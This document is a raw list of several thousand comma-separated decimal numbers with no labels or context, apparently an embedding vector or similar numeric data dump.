-0.00872194953262806, 0.00906053464859724, 0.006114845164120197, -0.012094256468117237, 0.029280830174684525, -0.03342511132359505, -0.024554183706641197, -0.006602407433092594, -0.024134337902069092, 0.007970291189849377, -0.005952324252575636, 0.01500608678907156, 0.020179666578769684, -0.022251805290579796, -0.018337763845920563, 0.030418476089835167, 0.0023125356528908014, 0.011654095724225044, -0.006351854652166367, 0.0023684019688516855, 0.02097872644662857, 0.014166396111249924, 0.011004012078046799, -0.0031471475958824158, -0.031826991587877274, 0.00030388004961423576, 0.0017928075976669788, -0.03280211612582207, 0.0013230209005996585, -0.002473363419994712, 0.0004225964075885713, -0.0018046580953523517, 0.006006497889757156, 0.019299345090985298, -0.004425305873155594, 0.0023819454945623875, 0.025637656450271606, -0.015317585319280624, 0.006060671526938677, 0.006852960214018822, -0.0165094044059515, -0.008525569923222065, -0.015547823160886765, -0.03217911720275879, -0.00011607116903178394, -0.03171864151954651, 0.0046521578915417194, 0.005701771471649408, 0.005860906094312668, -0.015480105765163898, -0.005339485593140125, -0.01353662833571434, 0.008728721179068089, -0.023321734741330147, -0.0025800177827477455, -0.02422914281487465, 0.006375555414706469, -0.004445620812475681, -0.02444583736360073, 0.014098679646849632, -0.01659066416323185, 0.03561914339661598, 0.007604619022458792, -0.010394559241831303, -0.0190555639564991, 0.0011689646635204554, 0.004056248348206282, -0.008302103728055954, -0.033452197909355164, -0.02175069972872734, 0.00193332030903548, 0.013719463720917702, 0.007570760790258646, 0.0012282170355319977, -0.0008240312454290688, 0.0019807221833616495, -0.010130463168025017, -0.0009107936639338732, -0.004489636979997158, -0.007780683226883411, -0.017186574637889862, 0.017010509967803955, -0.02753373235464096, -0.0038767983205616474, 0.012209375388920307, -0.007970291189849377, 0.01581869088113308, 0.018635718151926994, 0.01469458919018507, -0.006775085814297199, -0.009839280508458614, -0.016224993392825127, -0.0069308350794017315, -0.0028525786474347115, 0.00007358933362411335, 0.0037989236880093813, 0.004635228775441647, 0.003981759771704674, -0.012392210774123669, -0.0010690821800380945, -0.003555142553523183, -0.05143783241510391, 0.009507467038929462, 0.013407966122031212, -0.023795753717422485, 0.010658655315637589, -0.012547959573566914, -0.00563405454158783, -0.0032131716143339872, 0.015561366453766823, -0.0051058619283139706, 0.009168881922960281, -0.009771563112735748, 0.026707584038376808, -0.027289951220154762, 0.06430406123399734, 0.009040219709277153, -0.016766728833317757, -0.025271983817219734, -0.0019502495415508747, 0.03385850042104721, -0.018161699175834656, 0.006659966893494129, 0.004350817296653986, -0.02114124782383442, -0.006636266130954027, -0.01319804321974516, -0.012107799760997295, 0.012791741639375687, -0.017010509967803955, 0.005667912773787975, 0.023714493960142136, 0.003978373948484659, 0.008633917197585106, -0.004879009909927845, 0.004618299193680286, 0.019651472568511963, 0.020111948251724243, -0.02876618131995201, 0.013963245786726475, 0.0032351796980947256, 0.006365397945046425, -0.005711928941309452, -0.008207300677895546, 0.0070696547627449036, -0.02692427858710289, -0.008058322593569756, 0.003404472256079316, -0.001100401277653873, -0.013035522773861885, 0.0016150504816323519, 0.0004242893191985786, 0.0006411953363567591, -0.004980585537850857, 0.032206203788518906, 0.016482317820191383, -0.0037176632322371006, -0.017728310078382492, -0.02422914281487465, 0.018256502225995064, 0.004625071305781603, 0.0002990128705278039, -0.012988120317459106, 0.013137097470462322, -0.006836031097918749, -0.013340248726308346, -0.0052142092026770115, -0.001030991319566965, -0.007523358799517155, -0.026951365172863007, 0.01504671759903431, 0.003409550990909338, 0.02592206746339798, 0.002415803959593177, 0.01419348269701004, 0.01874406635761261, -0.0069545358419418335, 0.009162110276520252, 0.0061791762709617615, 0.017647050321102142, -0.001806351006962359, 0.007103513460606337, 0.009615814313292503, 0.008363049477338791, 0.005366572178900242, 0.02253621816635132, 0.022563304752111435, 0.004408376757055521, -0.0036905764136463404, 0.010665427893400192, 0.01952958293259144, -0.009446521289646626, 0.0022160387597978115, 0.002517379354685545, 0.012073940597474575, -0.0003790035843849182, -0.028251532465219498, 0.005705157294869423, -0.02376866713166237, -0.011850475333631039, 0.0015947353094816208, 0.004235698375850916, -0.0007381152827292681, 0.0017335552256554365, -0.022549761459231377, 0.022333066910505295, -0.0020078090019524097, -0.006659966893494129, -0.006175790447741747, 0.023714493960142136, 0.03339802473783493, -0.00813281163573265, -0.005762716755270958, 0.029876740649342537, 0.010475819930434227, 0.013793952763080597, 0.00025944074150174856, -0.011701497249305248, 0.013678833842277527, -0.013021979480981827, -0.026436716318130493, -0.020707858726382256, 0.008430766873061657, -0.007834856398403645, 0.028061924502253532, 0.03919459879398346, -0.04499117285013199, 0.016996966674923897, 0.0032453371677547693, 0.0053191701881587505, -0.008593287318944931, 0.01079409010708332, -0.004625071305781603, 0.010028887540102005, 0.002957539865747094, -0.0014914668863639235, -0.01029298361390829, -0.004083334933966398, 0.018256502225995064, 0.005617124959826469, -0.014626871794462204, -0.00021542470494750887, -0.0023260789457708597, -0.0216017235070467, -0.009053763002157211, 0.014179939404129982, -0.0020653684623539448, -0.0011114052031189203, -0.003568685846403241, -0.01812106929719448, -0.009311087429523468, 0.012988120317459106, -0.007117056753486395, -0.04474739357829094, 0.01319804321974516, -0.006869889795780182, -0.01469458919018507, -0.000980203622020781, 0.00572547223418951, -0.014789393171668053, 0.010902437381446362, -0.00813281163573265, 0.0009768176823854446, 0.02598978392779827, 0.002092455280944705, 0.01172858476638794, -0.00006581245543202385, -0.0006847881595604122, 0.004923026077449322, -0.0007436173036694527, -0.004770662635564804, -0.0070696547627449036, -0.00107500737067312, -0.0031623838003724813, -0.026409629732370377, -0.006456816103309393, -0.01657712087035179, -0.0167531855404377, 0.0014008954167366028, -0.010631568729877472, 0.0031505334191024303, 0.00596248172223568, 0.0188117828220129, 0.004794363398104906, 0.002595253987237811, -0.0005154956597834826, -0.005559565499424934, -0.0017894216580316424, 0.013746551238000393, 0.0017589490162208676, 0.021263137459754944, 0.02074848860502243, -0.0017200118163600564, -0.003434944897890091, -0.010360701009631157, 0.004916253965348005, 0.01827004738152027, -0.0015244790120050311, 0.015561366453766823, 0.012459928169846535, 0.009168881922960281, 0.015832234174013138, -0.0033367550931870937, -0.000814296945463866, -0.01952958293259144, -0.02646380290389061, -0.00508893234655261, 0.0010513063753023744, -0.03989885747432709, 0.02004423178732395, 0.020477620884776115, 0.036215052008628845, 0.0049907430075109005, 0.000899789622053504, -0.0016302868025377393, -0.025867894291877747, -0.0034941972699016333, 0.010699286125600338, 0.016780272126197815, 0.019475409761071205, 0.012365124188363552, 0.022333066910505295, 0.018188785761594772, 0.004730032291263342, -0.012256776914000511, 0.00007808616646798328, 0.01145771611481905, -0.027032626792788506, -0.027791056782007217, -0.004672472830861807, -0.0009531167452223599, -0.0016946179093793035, 0.0010919366031885147, -0.010238810442388058, 0.002793326275423169, -0.013123554177582264, -0.012256776914000511, -0.00441514840349555, -0.0089521873742342, -0.0004287332412786782, 0.02375512383878231, 0.0014017418725416064, 0.002568167168647051, -0.009195968508720398, 0.007977062836289406, 0.016089558601379395, 0.0005328481202013791, -0.03385850042104721, 0.006744612939655781, -0.0032131716143339872, 0.012764654122292995, 0.013435052707791328, -0.00744209811091423, 0.003401086200028658, -0.012784969992935658, 0.047645680606365204, -0.01400387566536665, -0.013780409470200539, -0.002161865122616291, -0.002346394117921591, 0.020409904420375824, -0.008166669867932796, -0.03193533793091774, -0.013035522773861885, -0.009344945661723614, 0.011132674291729927, 0.02784522995352745, -0.006378941237926483, 0.0030557296704500914, 0.0015024709282442927, 0.01180984452366829, 0.0379486083984375, 0.001577806076966226, -0.002359937410801649, 0.016373969614505768, -0.006710754707455635, 0.007218632381409407, -0.0023937958758324385, 0.011538976803421974, -0.004489636979997158, 0.01874406635761261, 0.01959729939699173, -0.017552245408296585, 0.008532341569662094, 0.013015206903219223, -0.01500608678907156, 0.015331128612160683, 0.02559702657163143, 0.010360701009631157, 0.006341697182506323, -0.0070357960648834705, 0.019962972030043602, -0.009507467038929462, -0.013868441805243492, -0.011417086236178875, -0.01102432794868946, -0.014356004074215889, -0.013170956633985043, -0.008870926685631275, -0.0032301009632647038, 0.012222918681800365, 0.021886134520173073, 0.019570212811231613, -0.0071441433392465115, 0.010618025436997414, 0.011836931109428406, -0.0002247357915621251, -0.03342511132359505, 0.018527371808886528, 0.007347294595092535, 0.006270593963563442, 0.006135160103440285, -0.025055289268493652, 0.0017157794209197164, -0.007191545329988003, -0.025028202682733536, 0.002969390479847789, -0.00521082291379571, -0.007137371692806482, 0.004499794449657202, 0.004411762580275536, 0.009209511801600456, -0.01126810908317566, 0.00139327731449157, 0.0029219884891062975, -0.008572972379624844, -0.006690439768135548, -0.003649946302175522, -0.0038767983205616474, 0.007570760790258646, 0.018933672457933426, -0.008288560435175896, 0.008925100788474083, 0.009893453679978848, -0.0066531952470541, -0.02984965406358242, -0.01260890532284975, -0.009317859075963497, 0.02383638359606266, -0.007306664250791073, -0.010171093046665192, 0.0005053381319157779, 0.009311087429523468, 0.011972365900874138, -0.004042705055326223, -0.02784522995352745, 0.0006361165433190763, -0.01797209121286869, -0.006741227116435766, 0.0008578897104598582, 0.008126039989292622, 0.020274469628930092, 0.014030962251126766, 0.00539704505354166, -0.00002667679473233875, -0.006412799935787916, 0.016468774527311325, 0.005921851843595505, -0.006297681014984846, 0.0018452882068231702, 0.018324220553040504, 0.0188117828220129, -0.003561914199963212, -0.004147666040807962, -0.006473745219409466, 0.01273079589009285, -0.01611664518713951, -0.011396771296858788, -0.008911557495594025, 0.009385576471686363, -0.01744389906525612, 0.021046442911028862, 0.0006340004038065672, 0.010665427893400192, 0.011200391687452793, -0.007665564306080341, 0.0017174724489450455, 0.021249594166874886, -0.0061453175731003284, -0.0027510030195116997, 0.0036093161907047033, 0.021466288715600967, -0.00033096683910116553, 0.005393659230321646, 0.0060132695361971855, -0.01912328042089939, -0.01099724043160677, -0.016550034284591675, 0.02515009418129921, 0.0022024954669177532, 0.011593149974942207, -0.01682090200483799, 0.01966501586139202, -0.005976025015115738, -0.00048375330516137183, -0.004614913370460272, 0.023335278034210205, -0.010265897028148174, 0.011633780784904957, 0.011478031054139137, 0.018324220553040504, -0.013435052707791328, -0.01052999310195446, -0.0027273022569715977, 0.025813721120357513, -0.017159488052129745, -0.024500010535120964, -0.009236598387360573, -0.010956610552966595, -0.02622002176940441, -0.014626871794462204, 0.017024053260684013, -0.00929754413664341, -0.012866229750216007, -0.00779422651976347, 0.010807633399963379, -0.02245495654642582, -0.015033174306154251, 0.02221117541193962, -0.009304315783083439, 0.007665564306080341, -0.02153400518000126, -0.006033584475517273, -0.005099090281873941, 0.006243507377803326, 0.0011334132868796587, 0.0005108400946483016, 0.011471259407699108, 0.00003899017974617891, -0.0014364469097927213, 0.013055837713181973, -0.007306664250791073, -0.024825051426887512, 0.005027987062931061, -0.020653685554862022, 0.0052142092026770115, -0.0049331835471093655, 0.02068077214062214, 0.01619790680706501, 0.003052343847230077, 0.002436119131743908, -0.0023260789457708597, -0.005197279620915651, -0.010408102534711361, -0.007828084751963615, -0.014518524520099163, 0.0004655543598346412, -0.021953850984573364, 0.024743791669607162, -0.005691614001989365, -0.005549408029764891, -0.00676831416785717, -0.030201781541109085, 0.018012721091508865, 0.003809081157669425, -0.007658792659640312, -0.020423447713255882, -0.0006124156061559916, -0.002734073903411627, 0.009074077941477299, -0.02753373235464096, -0.004137508571147919, 0.019732734188437462, 0.012250005267560482, -0.004117193631827831, -0.011308738961815834, -0.004983971361070871, 0.010198180563747883, -0.0015117820585146546, -0.033668890595436096, 0.015845777466893196, 0.02058596722781658, 0.002844114089384675, 0.0028712006751447916, 0.007266033906489611, -0.0056001958437263966, 0.0004238660912960768, -0.033993933349847794, -0.013211586512625217, -0.0049568843096494675, 0.027113886550068855, 0.015141521580517292, -0.003541599027812481, -0.01743035577237606, 0.008071866817772388, -0.018730521202087402, 0.004225540906190872, -0.010739916004240513, -0.0057491734623909, 0.01103109959512949, -0.02662632428109646, 0.006101301871240139, 0.013340248726308346, -0.0010106762638315558, 0.016631295904517174, -0.005894764792174101, 0.009426206350326538, 0.01566971279680729, -0.02585435099899769, -0.0007778990548104048, 0.007855172269046307, 0.01850028522312641, -0.006734455469995737, -0.01411222293972969, 0.008816753514111042, -0.006185947917401791, 0.008112496696412563, 0.013556943275034428, -0.020315099507570267, -0.028603659942746162, 0.007665564306080341, -0.0004829068493563682, 0.004597984254360199, 0.02337590791285038, 0.01434246078133583, -0.020179666578769684, -0.009487152099609375, 0.017728310078382492, -0.00017976747767534107, 0.010787318460643291, 0.02322693169116974, -0.012825599871575832, -0.010821176692843437, 0.013827810995280743, 0.0017386339604854584, -0.0017030825838446617, 0.012250005267560482, 0.0013848126400262117, -0.02739829756319523, -0.009866367094218731, -0.015696801245212555, 0.010719601064920425, -0.0072931209579110146, 0.011464487761259079, 0.021872591227293015, 0.0019096194300800562, 0.0010191408218815923, -0.0005832126480527222, -0.04128028452396393, 0.017728310078382492, 0.004032547120004892, -0.0013416430447250605, 0.008674548007547855, 0.004774048458784819, -0.004750347696244717, 0.010841491632163525, 0.0030946668703109026, -0.0038124669808894396, -0.023565515875816345, 0.015439475886523724, -0.0015473334351554513, 0.006805558688938618, 0.0010132156312465668, 0.02129022404551506, -0.016956336796283722, -0.02684301882982254, -0.001914698164910078, -0.007543673738837242, -0.026030413806438446, 0.0037887662183493376, 0.0015058567514643073, 0.0033672277349978685, -0.003148840507492423, -0.020856836810708046, -0.022807085886597633, 0.00659902160987258, 0.0015439476119354367, 0.01936706155538559, 0.000178180358489044, -0.005535864736884832, 0.018689891323447227, 0.007360837887972593, -0.01703759655356407, 0.004113807808607817, 0.00046936344006098807, -0.003998688887804747, -0.02784522995352745, -0.021859047934412956, -0.0003277926007285714, -0.02622002176940441, 0.0019248557509854436, -0.017565790563821793, 0.016522947698831558, 0.014681045897305012, 0.008938644081354141, -0.023348821327090263, -0.03900499269366264, 0.018405480310320854, -0.010706057772040367, -0.01446435134857893, -0.0036296311300247908, -0.005173578858375549, 0.022563304752111435, -0.01180307287722826, 0.01812106929719448, 0.0052379099652171135, -0.015439475886523724, -0.02035572938621044, -0.005193893797695637, -0.012283863499760628, -0.0027442313730716705, -0.008031236007809639, -0.031068559736013412, -0.02253621816635132, 0.017484528943896294, -0.013597573153674603, -0.01835130713880062, -0.009730933234095573, 0.03109564632177353, 0.00561035331338644, 0.033370938152074814, 0.0038056953344494104, -0.0028525786474347115, -0.010428418405354023, 0.005146491806954145, -0.005603581666946411, 0.02367386221885681, 0.030797692015767097, -0.0027239162009209394, -0.007861943915486336, -0.013448596000671387, -0.03943838179111481, 0.012487014755606651, 0.00983250793069601, 0.014748762361705303, -0.008349506184458733, 0.007767139934003353, 0.00019606186833698303, 0.009900225326418877, 0.008986045606434345, 0.005278540309518576, 0.022089285776019096, -0.017267834395170212, -0.01927225850522518, 0.0067649283446371555, 0.00412396527826786, -0.01621145009994507, -0.008234387263655663, -0.01744389906525612, -0.025109464302659035, -0.005579880904406309, 0.008186984807252884, -0.003280888544395566, -0.026653410866856575, -0.023118583485484123, 0.0012578432215377688, 0.002918602665886283, 0.003109903307631612, 0.012141657993197441, 0.00013363527250476182, 0.013672062195837498, -0.009846052154898643, -0.010706057772040367, 0.023728037253022194, 0.01067897118628025, 0.008965730667114258, 0.0036804189439862967, 0.0025072218850255013, 0.012791741639375687, 0.0041815247386693954, 0.013435052707791328, 0.0032013212330639362, -0.015249867923557758, 0.008633917197585106, -0.012405754067003727, 0.01789083145558834, 0.009703845717012882, 0.02715451642870903, 0.000673784117680043, 0.01659066416323185, 0.001169811119325459, 0.021236050873994827, -0.02676175907254219, -0.01260890532284975, -0.0037819943390786648, -0.0004397372540552169, -0.018324220553040504, 0.009588726796209812, -0.011701497249305248, 0.008383364416658878, 0.0013628046726807952, -0.0001456973550375551, 0.01006274577230215, -0.018716977909207344, 0.012866229750216007, -0.005017829593271017, -0.021615266799926758, -0.0107602309435606, -0.006856346037238836, 0.01465395838022232, 0.021087072789669037, 0.0010140620870515704, -0.01828359067440033, 0.020856836810708046, 0.011660867370665073, -0.015182151459157467, 0.001914698164910078, 0.0032013212330639362, 0.0305539108812809, -0.0013831197284162045, -0.010320071130990982, 0.009737704880535603, 0.01365174725651741, -0.002463205950334668, 0.024811508134007454, 0.009609042666852474, 0.008471396751701832, -0.01261567696928978, 0.0252178106456995, 0.014328917488455772, -0.0031843918841332197, 0.006003112066537142, 0.0056746844202280045, -0.00043846757034771144, -0.014220570214092731, 0.0038937274366617203, -0.0030354144982993603, 0.014830023050308228, -0.011166533455252647, -0.012635991908609867, 0.00012866230099461973, -0.0021076917182654142, -0.0031251395121216774, -0.01951603963971138, 0.009243370033800602, 0.004398219287395477, -0.018188785761594772, -0.007022252772003412, 0.017647050321102142, -0.0023887171410024166, -0.011769214645028114, -0.009101164527237415, 0.003985145594924688, 0.019245171919465065, 0.009399119764566422, -0.014667501673102379, 0.001621822128072381, 0.001471998286433518, 0.0006526226061396301, -0.007936432026326656, 0.0254615917801857, -0.0051566497422754765, -0.013333477079868317, -0.010692514479160309, -0.0049568843096494675, -0.0012451463844627142, 0.004699559882283211, -0.0016125109978020191, 0.0151144340634346, -0.01226354856044054, -0.010008572600781918, 0.008315647952258587, -0.0011046335566788912, 0.00653807632625103, 0.0058473628014326096, -0.0153582151979208, 0.0010648497845977545, 0.00223804684355855, -0.015710344538092613, 0.01835130713880062, -0.01168118230998516, -0.007076426409184933, -0.003346912795677781, -0.017322009429335594, -0.006961307488381863, -0.016834445297718048, 0.008220843970775604, -0.022928975522518158, -0.008633917197585106, 0.00561035331338644, -0.03001217357814312, -0.005031372886151075, -0.007584304083138704, 0.013604344800114632, -0.007455641869455576, 0.0019671788904815912, -0.00006739957461832091, 0.008329191245138645, 0.02166943997144699, 0.021276680752635002, 0.011931735090911388, 0.0017691066022962332, -0.014477894641458988, 0.005055074114352465, -0.020789118483662605, -0.01561554055660963, -0.008207300677895546, 0.022563304752111435, -0.003829396329820156, -0.000014072438716539182, -0.012446384876966476, -0.002156786387786269, 0.013719463720917702, 0.02114124782383442, 0.0017691066022962332, -0.00039466313319280744, 0.043393053114414215, 0.014789393171668053, -0.022251805290579796, 0.004025775473564863, 0.009141795337200165, -0.014559155330061913, -0.0031776202376931906, -0.009074077941477299, -0.014640415087342262, -0.0013848126400262117, -0.0055189356207847595, 0.020409904420375824, 0.023782210424542427, 0.0013966631377115846, 0.008078638464212418, 0.01572388783097267, -0.012757882475852966, 0.013516313396394253, -0.014708132483065128, -0.02004423178732395, -0.018080439418554306, -0.007868715561926365, -0.0000217567321669776, 0.003077737521380186, 0.029605872929096222, -0.00005163421155884862, -0.012778197415173054, 0.0011359526542946696, -0.017105314880609512, 0.0023176143877208233, -0.02168298326432705, 0.01076700259000063, -0.0032301009632647038, -0.01967856101691723, -0.024703161790966988, 0.0075639886781573296, 0.003421401372179389, 0.008925100788474083, -0.01067897118628025, -0.005759330932050943, 0.016522947698831558, -0.0009370339685119689, 0.008559429086744785, -0.01319127157330513, 0.0027442313730716705, -0.0019485566299408674, 0.02630128338932991, 0.011755671352148056, 0.008566200733184814, 0.015859320759773254, -0.02028801292181015, 0.017389725893735886, -0.006378941237926483, 0.0071780020371079445, -0.031149819493293762, -0.017565790563821793, -0.00277808983810246, 0.0030049418564885855, -0.0044049909338355064, -0.000034625605621840805, -0.0042627849616110325, 0.01603538542985916, 0.006798786576837301, 0.007882258854806423, -0.012371895834803581, 0.015304042026400566, 0.0064026424661278725, -0.0056509836576879025, 0.006974850781261921, 0.01565616950392723, -0.008166669867932796, 0.010936295613646507, 0.006290909368544817, 0.02329464815557003, -0.014328917488455772, -0.00503475870937109, -0.0002585942856967449, -0.012873001396656036, -0.002029817085713148, 0.008308876305818558, 0.018175242468714714, 0.0026104904245585203, -0.0016768422210589051, -0.004090106580406427, -0.013062609359622002, 0.012744339182972908, -0.010618025436997414, -0.0303101297467947, -0.0053191701881587505, -0.0028474999126046896, 0.007475956808775663, -0.010232038795948029, 0.020030688494443893, 0.03085186518728733, -0.0036601037718355656, 0.023565515875816345, 0.019163910299539566, -0.0014796163886785507, 0.02868492156267166, 0.0037819943390786648, -0.0019130052533000708, -0.006940992549061775, -0.027574362233281136, 0.005481691099703312, 0.004879009909927845, 0.03897790610790253, 0.009493923746049404, 0.0041815247386693954, 0.010787318460643291, -0.001736941048875451, 0.019163910299539566, -0.0016489089466631413, -0.013685605488717556, 0.007611390668898821, 0.008098953403532505, 0.018242958933115005, 0.01214842963963747, 0.006494060158729553, -0.04279714450240135, 0.0002323539520148188, 0.0037549075204879045, -0.01052999310195446, -0.006456816103309393, 0.0027239162009209394, -0.036296311765909195, -0.017945004627108574, 0.010076289996504784, -0.02575954608619213, 0.007834856398403645, 0.012683394365012646, -0.00929754413664341, 0.012114571407437325, -0.018419023603200912, 0.009392348118126392, -0.004313572775572538, -0.010238810442388058, -0.0006293448386713862, -0.014870652928948402, -0.00952778197824955, 0.011017556302249432, -0.005055074114352465, 0.005579880904406309, 0.023565515875816345, -0.020315099507570267, -0.005356414709240198, -0.012480243109166622, -0.005176964681595564, -0.004919640254229307, 0.006693825591355562, 0.018175242468714714, 0.008884469978511333, 0.001040302449837327, 0.001084318500943482, 0.00761816231533885, 0.007875487208366394, 0.011545748449862003, 0.0012823906727135181, -0.0014618407003581524, 0.011152990162372589, 0.0002564781461842358, -0.0008134504314512014, 0.0008583129965700209, -0.000978510593995452, 0.02615230530500412, 0.01943477801978588, 0.003995303064584732, -0.004371132235974073, -0.0001267577608814463, -0.009317859075963497, 0.006223192438483238, 0.005647597834467888, 0.02684301882982254, 0.0069883945398032665, 0.0331813283264637, -0.0077874548733234406, -0.01820232905447483, -0.011796301230788231, 0.006091143935918808, 0.009541325271129608, -0.006849574390798807, -0.01967856101691723, -0.0064026424661278725, 0.015453019179403782, -0.014613328501582146, 0.017322009429335594, 0.009744476526975632, 0.013577258214354515, 0.01284591481089592, 0.009033448062837124, -0.0012696937192231417, 0.021777786314487457, 0.0035280557349324226, -0.002410725224763155, 0.06376232951879501, -0.0012409139890223742, -0.015425932593643665, -0.005532478913664818, 0.0018080439185723662, -0.0034247871953994036, 0.0010572316823527217, 0.007821313105523586, 0.0033926216419786215, -0.008823525160551071, -0.015073804184794426, -0.0004456625028979033, -0.02444583736360073, -0.008972502313554287, 0.0022312751971185207, 0.031420689076185226, -0.0020907623693346977, 0.003626245306804776, -0.01897430419921875, -0.008512026630342007, 0.007658792659640312, -0.014207026921212673, -0.01354339998215437, -0.005887993145734072, -0.006497445981949568, -0.00005155485632712953, 0.004178138915449381, -0.01728137768805027, -0.0022160387597978115, -0.0022414326667785645, -0.007740052882581949, 0.017105314880609512, -0.013936158269643784, -0.020423447713255882, 0.015100890770554543, 0.005217595025897026, -0.010590938851237297, 0.01728137768805027, 0.0008870926685631275, -0.005322556011378765, 0.0011681182077154517, 0.016373969614505768, 0.012236461974680424, -0.002156786387786269, 0.008092181757092476, 0.007855172269046307, -0.0038361679762601852, -0.0030828164890408516, 0.00952101033180952, -0.01565616950392723, -0.0028779725544154644, -0.011850475333631039, 0.001430521602742374, 0.013015206903219223, 0.007415011525154114, 0.0068969763815402985, 0.02700554020702839, -0.016942793503403664, -0.00790934544056654, -0.006626108195632696, 0.002390410052612424, 0.013360563665628433, -0.009236598387360573, -0.00014622638991568238, 0.01365174725651741, -0.0000014184860219756956, -0.0015033173840492964, -0.025420961901545525, -0.0052954694256186485, 0.027520189061760902, 0.005522321444004774, -0.008986045606434345, -0.010902437381446362, -0.005779645871371031, -0.005099090281873941, -0.005515549797564745, -0.0009454985847696662, 0.006328153423964977, 0.005000900477170944, -0.004316958598792553, 0.012507329694926739, -0.02414788119494915, 0.0008460392709821463, -0.014504981227219105, -0.0005324248922988772, -0.019556669518351555, 0.018960759043693542, 0.02384992688894272, 0.039140425622463226, 0.026328369975090027, -0.0019874938298016787, -0.02367386221885681, 0.0016743028536438942, -0.01160669419914484, -0.011064957827329636, -0.012649535201489925, -0.01882532611489296, -0.0038767983205616474, -0.017403269186615944, -0.012940718792378902, 0.00801769271492958, 0.022400783374905586, 0.014396633952856064, -0.005857520271092653, 0.0034383307211101055, -0.003313054097816348, -0.014044505544006824, 0.005505391862243414, -0.0006225731922313571, -0.0028221060056239367, 0.012649535201489925, -0.0037989236880093813, -0.01331316214054823, 0.007394696585834026, -0.03063517063856125, 0.02352488599717617, 0.0014482972910627723, -0.004269556608051062, -0.027818143367767334, -0.01912328042089939, 0.010265897028148174, 0.009900225326418877, -0.007977062836289406, -0.007022252772003412, -0.0010301448637619615, 0.008647460490465164, 0.011599921621382236, -0.015764517709612846, 0.010116919875144958, -0.020179666578769684, -0.005309012718498707, -0.004059634171426296, 0.006439886521548033, 0.0033875429071485996, 0.00671414053067565, 0.009500695392489433, 0.015710344538092613, -0.013516313396394253, -0.0026443488895893097, 0.0035348273813724518, -0.009852823801338673, 0.0010039045009762049, 0.02097872644662857, -0.016387514770030975, -0.020328642800450325, 0.005617124959826469, -0.00238025258295238, -0.0077061946503818035, 0.01981399394571781, 0.014274743385612965, -0.002365016145631671, -0.013374107889831066, 0.019637929275631905, -0.00312344660051167, 0.0006026813061907887, 0.015168608166277409, 0.009168881922960281, 0.01673964224755764, 0.013164184987545013, -0.0029101381078362465, 0.014030962251126766, -0.004469322040677071, 0.0010453811846673489, 0.0060945297591388226, -0.003873412264510989, -0.00960227008908987, -0.006128388457000256, -0.03502323105931282, -0.0006318842642940581, 0.024283315986394882, 0.0013306390028446913, 0.007110285107046366, -0.00332659762352705, -0.001019987277686596, -0.01011014822870493, 0.0017978863324970007, -0.004137508571147919, 0.021114161238074303, -0.00014040696260053664, 0.004276328720152378, -0.008762579411268234, -0.009128251112997532, -0.0012104413472115993, 0.02214345894753933, 0.0015405617887154222, -0.009554868564009666, -0.005783031694591045, 0.009006360545754433, -0.00021013431251049042, 0.009683530777692795, -0.004811292979866266, 0.003426480107009411, 0.008383364416658878, 0.014288286678493023, -0.024879226461052895, 0.018473196774721146, 0.01913682371377945, 0.0007055265014059842, -0.003910656552761793, -0.017173031345009804, -0.0023684019688516855, 0.0033621490001678467, 0.018933672457933426, 0.007983834482729435, 0.002378559671342373, -0.02030155621469021, -0.018649261444807053, -0.011213934980332851, 0.006886818911880255, 0.009500695392489433, 0.004614913370460272, -0.0023988746106624603, 0.014911283738911152, 0.020098404958844185, 0.01611664518713951, -0.011992680840194225, 0.0007486960967071354, -0.0005861753015778959, -0.0016345190815627575, 0.0010453811846673489, -0.015304042026400566, -0.010550308972597122, 0.024364575743675232, 0.01711885817348957, 0.009270457550883293, 0.007638477720320225, 0.007110285107046366, -0.025258440524339676, 0.02120896428823471, -0.008356277830898762, -0.022089285776019096, 0.02909122221171856, -0.0019519425695762038, -0.0032842743676155806, 0.0009675066103227437, -0.007712966296821833, -0.00567129859700799, -0.009202740155160427, 0.005275154486298561, 0.029958000406622887, 0.004604755900800228, -0.0017877287464216352, 0.014383090659976006, -0.009473607875406742, 0.0303101297467947, 0.01780957169830799, -0.011037871241569519, -0.011823387816548347, 0.028197359293699265, 0.02769625373184681, 0.01149157527834177, 0.024120794609189034, 0.02120896428823471, 0.0004939108621329069, 0.018310677260160446, 0.009920540265738964, 0.0036668754182755947, -0.009554868564009666, -0.011884333565831184, 0.020084861665964127, 0.013468910939991474, -0.019637929275631905, -0.001774185337126255, -0.012175516225397587, -0.021845504641532898, -0.026179391890764236, 0.00482145044952631, 0.008200529031455517, 0.04358265921473503, -0.007110285107046366, 0.013753322884440422, -0.03865286335349083, 0.03009343519806862, -0.005776260048151016, -0.019786907359957695, 0.02053179405629635, -0.0021974167320877314, -0.0019130052533000708, -0.0015464869793504477, -0.01469458919018507, -0.009846052154898643, -0.011092044413089752, -0.013333477079868317, 0.0019367061322554946, 0.027344124391674995, 0.00323856552131474, 0.007814541459083557, 0.005827047862112522, 0.006744612939655781, -0.033370938152074814, -0.012588590383529663, -0.0005252299597486854, 0.0024090323131531477, 0.013137097470462322, -0.023809297010302544, -0.02498757280409336, 0.006609179079532623, -0.022238261997699738, -0.009311087429523468, -0.0252178106456995, -0.008789666928350925, -0.015182151459157467, -0.015331128612160683, -0.020965183153748512, -0.005762716755270958, -0.0010800861055031419, 0.0008109110640361905, -0.018066896125674248, -0.04249918833374977, 0.004191682208329439, -0.0009014825336635113, 0.009121479466557503, 0.011538976803421974, 0.011274880729615688, -0.021886134520173073, -0.014288286678493023, -0.03299172222614288, -0.01828359067440033, 0.0050483024679124355, 0.03280211612582207, -0.01927225850522518, 0.018175242468714714, -0.01952958293259144, -0.02166943997144699, -0.01307615265250206, 0.008410451002418995, 0.004100264515727758, -0.014681045897305012, 0.023484256118535995, -0.006690439768135548, -0.009053763002157211, -0.01703759655356407, 0.015845777466893196, 0.0006416185642592609, 0.01859508827328682, 0.012859458103775978, 0.013922614976763725, 0.01469458919018507, 0.030526824295520782, 0.016387514770030975, -0.01627916656434536, -0.004120579455047846, 0.0036601037718355656, -0.006216420792043209, 0.010367472656071186, -0.0020789119880646467, 0.002908445196226239, 0.006372169591486454, 0.008410451002418995, -0.01780957169830799, 0.011830159462988377, 0.0010504599194973707, -0.0003305436111986637, 0.02005777508020401, -0.010482591576874256, 0.009040219709277153, -0.010577395558357239, 0.009432977996766567, 0.017633507028222084, 0.003873412264510989, -0.008647460490465164, 0.0009742783149704337, 0.011525433510541916, -0.0009057148708961904, 0.0029406107496470213, -0.009791878052055836, 0.009439749643206596, -0.013353792019188404, 0.006328153423964977, 0.012101028114557266, 0.008383364416658878, 0.004350817296653986, -0.02715451642870903, -0.009128251112997532, 0.009155338630080223, 0.0011867404682561755, 0.0019790292717516422, -0.0020213525276631117, 0.010347157716751099, 